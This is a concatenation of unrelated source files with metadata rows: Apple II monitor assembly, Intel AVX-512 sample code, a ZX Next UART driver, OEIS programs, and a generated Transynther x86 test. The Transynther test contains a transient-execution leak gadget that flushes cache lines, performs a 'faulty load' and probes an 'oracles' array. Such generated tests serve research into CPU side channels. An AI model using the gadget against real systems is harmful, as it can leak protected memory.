STA .CV ; AND H-INDICES
LDY #$00
STY .CH ;THEN CLEAR TO END OF PAGE
BEQ .CLEOP1
.CR LDA #$00 ;CURSOR TO LEFT OF INDEX
STA .CH ;(RET CURSOR H=0)
.LF INC .CV ;INCR CURSOR V(DOWN 1 LINE)
LDA .CV
CMP .WNDBTM ;OFF SCREEN?
BCC .VTABZ ; NO, SET BASE ADDR
DEC .CV ;DECR CURSOR V (BACK TO BOTTOM)
.SCROLL LDA .WNDTOP ;START AT TOP OF SCRL WNDW
PHA
JSR .VTABZ ;GENERATE BASE ADR
.SCRL1 LDA .BASL ;COPY BASL,H
STA .BAS2L ; TO BAS2L,H
LDA .BASH
STA .BAS2H
LDY .WNDWDTH ;INIT Y TO RIGHTMOST INDEX
DEY ; OF SCROLLING WINDOW
PLA
ADC #$01 ;INCR LINE NUMBER
CMP .WNDBTM ;DONE?
BCS .SCRL3 ; YES, FINISH
PHA
JSR .VTABZ ;FORM BASL,H (BASE ADDR)
.SCRL2 LDA (.BASL),Y ;MOVE A CHR UP ON LINE
STA (.BAS2L),Y
DEY ;NEXT CHAR OF LINE
BPL .SCRL2
BMI .SCRL1 ;NEXT LINE (ALWAYS TAKEN)
.SCRL3 LDY #$00 ;CLEAR BOTTOM LINE
JSR .CLEOLZ ;GET BASE ADDR FOR BOTTOM LINE
BCS .VTAB ;CARRY IS SET
.CLREOL LDY .CH ;CURSOR H INDEX
.CLEOLZ LDA #$A0
.CLEOL2 STA (.BASL),Y ;STORE BLANKS FROM 'HERE'
INY ; TO END OF LINES (WNDWDTH)
CPY .WNDWDTH
BCC .CLEOL2
RTS
.WAIT SEC
.WAIT2 PHA
.WAIT3 SBC #$01
BNE .WAIT3 ;1.0204 USEC
PLA ;(13+27/2*A+5/2*A*A)
SBC #$01
BNE .WAIT2
RTS
KEYIN INC .RNDL
BNE .KEYIN2 ;INCR RND NUMBER
INC .RNDH
.KEYIN2 BIT .KBD ;KEY DOWN?
BPL KEYIN ; LOOP
STA (.BASL),Y ;REPLACE FLASHING SCREEN
LDA .KBD ;GET KEYCODE
BIT .KBDSTRB ;CLR KEY STROBE
RTS
CROUT LDA #$8D
BNE COUT
PRBYTE PHA ;PRINT BYTE AS 2 HEX
LSR ; DIGITS, DESTROYS A-REG
LSR
LSR
LSR
JSR .PRHEXZ
PLA
.PRHEX AND #$0F ;PRINT HEX DIG IN A-REG
.PRHEXZ ORA #$B0 ; LSB'S
CMP #$BA
BCC COUT
ADC #$06
COUT JMP (.CSWL) ;VECTOR TO USER OUTPUT ROUTINE
COUT1 CMP #$A0
BCC .COUTZ ;DON'T OUTPUT CTRL'S INVERSE
AND .INVFLG ;MASK WITH INVERSE FLAG
.COUTZ STY .YSAV1 ;SAV Y-REG
PHA ;SAV A-REG
JSR .VIDOUT ;OUTPUT A-REG AS ASCII
PLA ;RESTORE A-REG
LDY .YSAV1 ; AND Y-REG
RTS ; THEN RETURN
.SETNORM LDY #$FF ;SET FOR NORMAL VID
.SETIFLG STY .INVFLG
RTS
.SETKBD LDA #$00 ;SIMULATE PORT #0 INPUT
.INPORT STA .A2L ; SPECIFIED (KEYIN ROUTINE)
.INPRT LDX #.KSWL
LDY #<KEYIN
BNE .IOPRT
.SETVID LDA #$00 ;SIMULATE PORT #0 OUTPUT
.OUTPORT STA .A2L ; SPECIFIED (COUT1 ROUTINE)
.OUTPRT LDX #.CSWL
LDY #<COUT1
.IOPRT LDA .A2L ;SET RAM IN/OUT VECTORS
AND #$0F
BEQ .IOPRT1
ORA #>.IOADR
LDY #$00
BEQ .IOPRT2
.IOPRT1 LDA #>COUT1
.IOPRT2 STY .LOC0,X
STA .LOC1,X
RTS
RESET JSR .SETNORM ;SET SCREEN MODE
JSR .INIT ; AND INIT KBD/SCREEN
JSR .SETVID ; AS I/O DEV'S
JSR .SETKBD
CLD ;MUST SET HEX MODE!
RTS
} ; monitor
| 31.273026 | 57 | 0.4503 |
dfbec421e8ac24a43c19170236fb5fb5e6bf61ad | 7,926 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_452.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_452.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_452.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r14
push %r15
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0xefba, %r15
nop
and $22501, %r14
mov (%r15), %esi
nop
nop
nop
nop
nop
and %rcx, %rcx
lea addresses_normal_ht+0x186fa, %rax
dec %rbp
mov (%rax), %dx
nop
nop
nop
nop
add $7719, %rax
lea addresses_UC_ht+0x9ba, %r15
nop
nop
nop
sub %rdx, %rdx
mov (%r15), %ax
nop
cmp $53347, %rcx
lea addresses_WC_ht+0xb7ba, %rcx
nop
nop
nop
nop
add %rsi, %rsi
mov $0x6162636465666768, %rax
movq %rax, (%rcx)
nop
and $54260, %rbp
lea addresses_normal_ht+0xcfba, %rdx
nop
nop
nop
nop
nop
add $28543, %rcx
movups (%rdx), %xmm1
vpextrq $0, %xmm1, %r15
nop
and %rdx, %rdx
lea addresses_A_ht+0x113ba, %rax
cmp $61238, %rbp
mov (%rax), %rdx
nop
nop
nop
cmp $21055, %rbp
lea addresses_normal_ht+0xc1ba, %rsi
lea addresses_A_ht+0x27ba, %rdi
nop
nop
nop
nop
sub %r14, %r14
mov $5, %rcx
rep movsq
nop
nop
nop
inc %rdi
lea addresses_D_ht+0xa93a, %rsi
lea addresses_WC_ht+0x140aa, %rdi
xor $3499, %r15
mov $111, %rcx
rep movsw
nop
nop
nop
sub %rbp, %rbp
lea addresses_A_ht+0x5bba, %rsi
nop
nop
nop
nop
and %r15, %r15
movl $0x61626364, (%rsi)
nop
nop
nop
cmp $1055, %rsi
lea addresses_normal_ht+0x117fa, %rdx
nop
nop
nop
and %rbp, %rbp
movw $0x6162, (%rdx)
nop
nop
nop
xor %rbp, %rbp
lea addresses_UC_ht+0x4dea, %rdx
nop
nop
dec %r15
movb $0x61, (%rdx)
nop
nop
nop
nop
lfence
lea addresses_D_ht+0xf442, %rdx
nop
nop
nop
and $15839, %rsi
movups (%rdx), %xmm1
vpextrq $1, %xmm1, %rcx
nop
nop
nop
nop
cmp $28435, %rax
lea addresses_normal_ht+0x14bee, %rsi
lea addresses_A_ht+0x1ebba, %rdi
nop
nop
nop
cmp %rax, %rax
mov $13, %rcx
rep movsb
nop
nop
xor %rsi, %rsi
lea addresses_normal_ht+0x249, %rsi
lea addresses_UC_ht+0x1751a, %rdi
clflush (%rdi)
nop
nop
add $60117, %rbp
mov $118, %rcx
rep movsq
nop
inc %rbp
lea addresses_D_ht+0x137ba, %rsi
lea addresses_normal_ht+0x1680a, %rdi
nop
nop
xor %rdx, %rdx
mov $67, %rcx
rep movsl
xor $58985, %r14
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r15
pop %r14
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r13
push %r9
push %rcx
push %rdi
push %rsi
// Store
lea addresses_RW+0x1efba, %rcx
clflush (%rcx)
sub %rdi, %rdi
movb $0x51, (%rcx)
nop
nop
and $56287, %rsi
// Faulty Load
lea addresses_PSE+0x1d7ba, %r13
cmp $61717, %rsi
movb (%r13), %r10b
lea oracles, %rcx
and $0xff, %r10
shlq $12, %r10
mov (%rcx,%r10,1), %r10
pop %rsi
pop %rdi
pop %rcx
pop %r9
pop %r13
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_PSE', 'AVXalign': False, 'size': 32, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'type': 'addresses_RW', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 11}}
[Faulty Load]
{'src': {'type': 'addresses_PSE', 'AVXalign': False, 'size': 1, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 10}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 2, 'NT': False, 'same': True, 'congruent': 4}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 9}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 11}}
{'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 9}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'size': 8, 'NT': False, 'same': True, 'congruent': 8}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 9, 'same': True}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 11, 'same': False}}
{'src': {'type': 'addresses_D_ht', 'congruent': 7, 'same': True}, 'OP': 'REPM', 'dst': {'type': 'addresses_WC_ht', 'congruent': 3, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'AVXalign': False, 'size': 4, 'NT': False, 'same': False, 'congruent': 9}}
{'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 6}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 4}}
{'src': {'type': 'addresses_D_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 3}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_normal_ht', 'congruent': 1, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 10, 'same': False}}
{'src': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 4, 'same': False}}
{'src': {'type': 'addresses_D_ht', 'congruent': 9, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_normal_ht', 'congruent': 4, 'same': False}}
{'33': 21829}
33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
*/
| 34.611354 | 2,999 | 0.656826 |
50921879bc683625635bae3594720fae197ab99f | 1,404 | asm | Assembly | chap18/ex6/blend_avx512.asm | JamesType/optimization-manual | 61cdcebb16e0768a6ab7e85ed535e64e9d8cc31a | [
"0BSD"
] | 374 | 2021-06-08T10:42:01.000Z | 2022-03-29T14:21:45.000Z | chap18/ex6/blend_avx512.asm | JamesType/optimization-manual | 61cdcebb16e0768a6ab7e85ed535e64e9d8cc31a | [
"0BSD"
] | 1 | 2021-06-11T20:24:02.000Z | 2021-06-11T20:24:02.000Z | chap18/ex6/blend_avx512.asm | JamesType/optimization-manual | 61cdcebb16e0768a6ab7e85ed535e64e9d8cc31a | [
"0BSD"
] | 39 | 2021-06-08T11:25:29.000Z | 2022-03-05T05:14:17.000Z | ;
; Copyright (C) 2021 by Intel Corporation
;
; Permission to use, copy, modify, and/or distribute this software for any
; purpose with or without fee is hereby granted.
;
; THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
; REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
; AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
; INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
; LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
; OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
; PERFORMANCE OF THIS SOFTWARE.
;
; .globl blend_avx512
; # void blend_avx512(uint32_t *a, uint32_t *b, uint32_t *c, size_t N);
; # On entry:
; # rcx = a
; # rdx = b
; # r8 = c
; # r9 = N
.code
blend_avx512 PROC public
push rbx
mov rax, r9
; mov rax, rcx ; mov rax, pImage
mov rbx, rdx ; mov rbx, pImage1
mov r9, r8 ; mov r9, pOutImage
mov r8, rax ; mov r8, len
vpxord zmm0, zmm0, zmm0
mainloop:
vmovdqa32 zmm2, [rcx+r8*4-40h]
vmovdqa32 zmm1, [rbx+r8*4-40h]
vpcmpgtd k1, zmm1, zmm0
vmovdqa32 zmm3, zmm2
vpslld zmm2, zmm2, 1
vpsrld zmm3, zmm3, 1
vmovdqa32 zmm3 {k1}, zmm2
vmovdqa32 [r9+r8*4-40h], zmm3
sub r8, 16
jne mainloop
pop rbx
vzeroupper
ret
blend_avx512 ENDP
end | 25.527273 | 79 | 0.687322 |
e38b06bc3330ae64977389253bb658baa300f652 | 10,711 | asm | Assembly | src/uart.asm | maziac/dezogif | e92f6a0e21ac6b465349e193417e3f19721f763d | [
"MIT"
] | 2 | 2020-05-25T09:25:46.000Z | 2020-12-30T10:43:58.000Z | src/uart.asm | maziac/dezogif | e92f6a0e21ac6b465349e193417e3f19721f763d | [
"MIT"
] | null | null | null | src/uart.asm | maziac/dezogif | e92f6a0e21ac6b465349e193417e3f19721f763d | [
"MIT"
] | null | null | null | ;===========================================================================
; uart.asm
;
; Routines for the lowel handling of the UART.
; I.e.
; - Check the port for received byte.
; - Get received byte.
; - Send one byte.
;
; Speed:
; The routine runs at 28MHz. I.e. 7MHz for 4 T-States.
; Or 7 million simple instructions per second.
; Baudrate:
; The baudrate maximum is 1958400. Which is approx. 200kBytes per second.
; That means download of a 64k Z80 program would take up to 0.25 seconds.
;
; The minimum required time for reading 1 byte at max. clock speed is
; about 3us. Transmission time is 5us.
; Timeout is set to 393us.
;
;
;
;===========================================================================
;===========================================================================
; Constants
;===========================================================================
; UART baudrate
;BAUDRATE: equ 1958400
; UART TX. Write=transmit data, Read=status
PORT_UART_TX: equ 0x133b
; UART RX. Read data.
PORT_UART_RX: equ 0x143b
; UART selection.
PORT_UART_CONTROL: equ 0x153b
; UART Status Bits:
UART_RX_FIFO_EMPTY: equ 0 ; 0=empty, 1=not empty
UART_RX_FIFO_FULL: equ 2 ; 0=not full, 1=full
UART_TX_READY: equ 1 ; 0=ready for next byte, 1=byte is being transmitted
;===========================================================================
; Const data.
;===========================================================================
; Baudrate timing calculation table.
; BAUDRATE must be 230400 at least otherwise a 1 byte table is not sufficient.
baudrate_table:
defb 28000000/BAUDRATE
defb 28571429/BAUDRATE
defb 29464286/BAUDRATE
defb 30000000/BAUDRATE
defb 31000000/BAUDRATE
defb 32000000/BAUDRATE
defb 33000000/BAUDRATE
defb 27000000/BAUDRATE
;===========================================================================
; Clears the receive FIFO.
; Changes:
; A, E, BC
;===========================================================================
drain_rx_buffer:
ld b,0 ; Check 256x that there is no data
.wait_loop:
push bc
call .read_loop
pop bc
djnz .wait_loop
ret
.read_loop:
ld bc,PORT_UART_TX
in a,(c) ; Read status bits
bit UART_RX_FIFO_EMPTY,a
ret z ; Return if buffer empty
; At least 1 byte received, read it
inc b ; The low byte stays the same
in a,(c)
dec b
jr .read_loop
;===========================================================================
; Just changes the border color.
;===========================================================================
change_border_color:
ld a,(slow_border_change)
or a
ret z ; Don't change color if off
ld a,(border_color)
inc a
and 0x07
ld (border_color),a
out (BORDER),a
ret
;===========================================================================
; Waits until an RX byte is available.
; Changes the border color slowly to indicate waiting state (like for tape
; loading).
; Note: This runs when possibly the layer 2 read/write is set. I.e. it is not
; allowed to read/write data.
; I.e. also no CALLs, no PUSH/POP.
; Changes:
; A, DE, BC
;===========================================================================
wait_for_uart_rx:
; Write layer 2 previous value
ld a,(backup.layer_2_port)
ld bc,LAYER_2_PORT
out (c),a
.color_change:
IF 0
; Change border color
ld a,c
inc a
and 0x07
out (BORDER),a
ld c,a
ENDIF
; Counter
ld de,0
ld b,20
.loop:
; Check if byte available.
ld a,HIGH PORT_UART_TX
in a,(LOW PORT_UART_TX) ; Read status bits
bit UART_RX_FIFO_EMPTY,a
jr z,.no_byte ; Jump if no byte available
; Disable layer 2 read/write
ld a,(backup.layer_2_port)
and 11111010b ; Disable read/write only
ld bc,LAYER_2_PORT
out (c),a
ret ; RET if byte available
.no_byte:
; Decrement counter for changing the color
dec e
jr nz,.loop
dec d
jr nz,.loop
djnz .loop
; change color
jr .color_change
;===========================================================================
; Checks if a byte is available at the UART.
; Returns:
; NZ = Byte available
; Z = No byte available
; Changes:
; AF
;===========================================================================
check_uart_byte_available:
ld a,HIGH PORT_UART_TX
in a,(LOW PORT_UART_TX)
; Read status bits
bit UART_RX_FIFO_EMPTY,a
ret
;===========================================================================
; Waits until an RX byte is available and returns it.
; Returns:
; A = the received byte.
; Changes:
; BC, E
; Duration:
; 66 T-states minimum
; 2.4us at 28MHz
;===========================================================================
read_uart_byte:
; Change border
.flash1:
ld a,BLUE
out (BORDER),a
; Wait on byte
ld e,0
ld bc,PORT_UART_TX
.wait_loop:
in a,(c) ; Read status bits
bit UART_RX_FIFO_EMPTY,a
jr nz,.byte_received
dec e
jr nz,.wait_loop
; "Timeout"
; Waited for 256*43 T-states=393us
.timeout:
nop ; LOGPOINT read_uart_byte: ERROR=TIMEOUT
jp rx_timeout ; ASSERTION
.byte_received:
; Change border
.flash2:
ld a,YELLOW
out (BORDER),a
; At least 1 byte received, read it
inc b ; The low byte stays the same
in a,(c)
ret
; Called if a UART RX timeout occurs.
; As this could happen from everywhere the call stack is reset
; and then the cmd_loop is entered again.
rx_timeout: ; The receive timeout handler
ld a,ERROR_RX_TIMEOUT
timeout:
ld (last_error),a
jp main
; Called if a UART TX timeout occurs.
; As this could happen from everywhere the call stack is reset
; and then the cmd_loop is entered again.
tx_timeout: ; The receive timeout handler
ld a,ERROR_TX_TIMEOUT
jr timeout
;===========================================================================
; Enables flashing of the border while receiving data.
;===========================================================================
uart_flashing_border.enable:
ld a,0x3E ; LD A,n
ld (read_uart_byte.flash1),a
ld (read_uart_byte.flash2),a
ld a,BLUE
ld (read_uart_byte.flash1+1),a
ld a,YELLOW
ld (read_uart_byte.flash2+1),a
ret
;===========================================================================
; Disables flashing of the border while receiving data.
;===========================================================================
uart_flashing_border.disable:
ld a,0x18 ; JR 2
ld (read_uart_byte.flash1),a
ld (read_uart_byte.flash2),a
ld a,2
ld (read_uart_byte.flash1+1),a
ld (read_uart_byte.flash2+1),a
ret
;===========================================================================
; Waits until TX is ready on the UART and writes one byte to the UART.
; Parameter:
; A = the byte to write.
; Returns:
; -
; Changes:
; BC
;===========================================================================
write_uart_byte:
push de, af
; Wait for TX ready
call wait_for_uart_tx
; Transmit byte
pop af, de
out (c),a
ret
;===========================================================================
; Waits until TX is ready on the UART.
; If it takes too long an error is generated.
; Changes:
; AF, BC (=PORT_UART_TX), E
;===========================================================================
wait_for_uart_tx:
; Send response back
ld bc,PORT_UART_TX
; Check if ready for transmit
ld e,0
.wait_tx:
in a,(c)
bit UART_TX_READY,a
ret z
dec e
jr nz,.wait_tx
nop ; LOGPOINT write_uart_byte: ERROR=TIMEOUT
jp tx_timeout ; ASSERTION
;===========================================================================
; Sets the UART baud rate.
; Source code is taken from NDS, https://github.com/Ckirby101/NDS-NextDevSystem.
; See also https://dl.dropboxusercontent.com/s/a4c4k9fsh2aahga/UsingUART2andWIFI.txt?dl=0
; The baudrate timings depend on the video timings in register 0x11.
; They don't depend on video mode being 50 or 60 Hz.
; Returns:
; -
; Changes:
; A, BC, DE, HL
;===========================================================================
set_uart_baudrate:
; Select UART and clear prescaler MSB
ld bc,PORT_UART_CONTROL
ld a,00010000b
out (c),a
; Get display timing
ld a,REG_VIDEO_TIMING
call read_tbblue_reg
and 0111b ;video timing is in bottom 3 bits, e.g. HDMI=111b
; Get baudrate prescale values from table
ld hl,baudrate_table
add hl,a
ld a,(hl)
; ignoring the high byte
; Write low byte of prescaler
ld bc,PORT_UART_RX ; Writing=set baudrate
ld l,a
and 0x7F
out (c),a ;set lower 7 bits
; Write 2nd byte of prescaler
rlc l
ld a,0x40
rla
out (c),a ;set to upper bits
ret
;===========================================================================
; Sets up the ESP UART at joystick port.
; TX = PIN 7 both joystick ports
; RX = PIN 9 Joystick 2
; These pins are not used on normal Joystick.
; Only for Sega Genesis controller which cannot be used.
; Parameters:
; uart_joyport_selection:
; 0x0=00b => no joystick port used
; 0x1=01b => joyport 1
; 0x2=10b => joyport 2
; Changed:
; AF, BC, HL
;===========================================================================
set_uart_joystick:
ld a,(uart_joyport_selection)
ld l,a
; Read reg 0x05 to preserve the 50/60 Hz setting and scandoubler
ld a,REG_PERIPHERAL_1
call read_tbblue_reg ; Reading the joysticks returns the original joy mode, even if set to UART
; Joy 1
bit 0,l
jr z,.no_joy1
or 11001000b
.no_joy1:
; Joy 2
bit 1,l
jr z,.no_joy2
or 00110010b
.no_joy2:
; Write to reg 0x05
nextreg REG_PERIPHERAL_1,a
; Write to 0x37
ld a,10010000b ; Right joystick (Joy 2)
bit 1,l
jr nz,.joy_2
; Check for joy 1
bit 0,l
jr z,.no_joys ; Neither 1 or 2
; Joy 1
ld a,10000000b ; Left joystick (Joy 1)
.joy_2:
out (KEMPSTON_JOY_2),a
.no_joys:
ret
;===========================================================================
; Waits for a certain number of scanlines.
; Parameters:
; H = the number of scanlines to wait.
; Changed:
; AF, BC, HL
;===========================================================================
IF 0
wait_scan_lines:
ld bc,IO_NEXTREG_REG
ld a,REG_ACTIVE_VIDEO_LINE_L
out (c),a
inc b
; Read first value
in a,(c)
ld l,a
; Loop
.loop:
in a,(c) ; read the raster line LSB
cp l
jr z,.loop
; Line changed
ld l,a
dec h
jr nz,.loop
ret
ENDIF
| 25.025701 | 102 | 0.524227 |
6b4b01a664f89e091d028f4afcf5745f18b67469 | 732 | asm | Assembly | programs/oeis/061/A061547.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/061/A061547.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/061/A061547.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A061547: Number of 132 and 213-avoiding derangements of {1,2,...,n}.
; 0,1,2,6,10,26,42,106,170,426,682,1706,2730,6826,10922,27306,43690,109226,174762,436906,699050,1747626,2796202,6990506,11184810,27962026,44739242,111848106,178956970,447392426,715827882,1789569706,2863311530,7158278826,11453246122,28633115306,45812984490,114532461226,183251937962,458129844906,733007751850,1832519379626,2932031007402,7330077518506,11728124029610,29320310074026,46912496118442,117281240296106,187649984473770,469124961184426,750599937895082,1876499844737706,3002399751580330,7505999378950826
mov $2,$0
mov $3,3
lpb $2,1
add $1,1
mov $4,$3
mov $3,$1
lpb $4,1
mov $1,$4
mul $3,2
trn $4,$3
add $3,$4
lpe
sub $2,1
lpe
| 40.666667 | 509 | 0.777322 |
06dcffdebf4ea1e72cf435d5e1cb1562939093e7 | 676 | asm | Assembly | oeis/208/A208950.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/208/A208950.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/208/A208950.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A208950: a(4*n) = n*(16*n^2-1)/3, a(2*n+1) = n*(n+1)*(2*n+1)/6, a(4*n+2) = (4*n+1)*(4*n+2)*(4*n+3)/6.
; 0,0,1,1,5,5,35,14,42,30,165,55,143,91,455,140,340,204,969,285,665,385,1771,506,1150,650,2925,819,1827,1015,4495,1240,2728,1496,6545,1785,3885,2109,9139,2470,5330,2870,12341,3311,7095,3795,16215,4324,9212,4900,20825,5525,11713,6201,26235,6930,14630,7714,32509,8555,17995,9455,39711,10416,21840,11440,47905,12529,26197,13685,57155,14910,31098,16206,67525,17575,36575,19019,79079,20540,42660,22140,91881,23821,49385,25585,105995,27434,56782,29370,121485,31395,64883,33511,138415,35720,73720,38024
mov $1,$0
bin $0,2
add $1,1
dif $1,2
mul $1,$0
dif $1,2
mov $0,$1
div $0,3
| 56.333333 | 495 | 0.707101 |
4295668bdb040e931e5ebe172ae183d544b1e476 | 502 | asm | Assembly | oeis/079/A079777.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/079/A079777.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
